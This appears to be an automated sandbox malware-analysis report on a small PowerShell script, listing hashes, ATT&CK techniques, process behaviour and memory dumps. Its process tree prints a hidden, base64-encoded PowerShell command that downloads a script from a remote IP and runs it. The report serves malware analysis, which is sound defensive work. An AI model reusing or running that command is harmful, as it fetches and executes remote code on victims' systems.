1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
03-01-2025 03:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21.ps1
Size

168B
MD5

2dc54835b9c45ed739a864b1732f7cd6
SHA1

7df3a0414a8972dcb6c025f14646d8570a117b40
SHA256

1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21
SHA512

42a57f6d58b302e3a239dbb2e1f282d1b8d1446f93bc60e65933da64361a876c238d12b2eae3ab53eaf20f1973888714363e628beb9d718a9f5d827416aea40f

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2748	powershell.exe
2656	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2748	powershell.exe
2656	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2748 wrote to memory of 2656	2748	powershell.exe	32
PID 2748 wrote to memory of 2656	2748	powershell.exe	32
PID 2748 wrote to memory of 2656	2748	powershell.exe	32

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdAByAHcAcwBmAGcALgBwAHMAMQAgAHwAIABpAGUAeAA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a417f1478c9877613a4da8f53fd40328

SHA1
990b21a36bea490855cb1b0ac498f48674f7f079

SHA256
e0f4fc9248d3b6b1600e37d2583a19f26118a57270cae201ed8d9ebf253ae199

SHA512
067d8ad34f386297e92f99c7fe59767aa4ea077511611455e24a74c2ab064b3724a247dbb05aa6c3e111bdd31d8860c0569ebfbe5cea6c42c8fe3e52c57f0066

Download Submit
memory/2656-14-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2656-15-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2748-4-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp

Filesize
4KB

Download
memory/2748-5-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2748-6-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

Filesize
32KB

Download
memory/2748-7-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2748-9-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2748-16-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download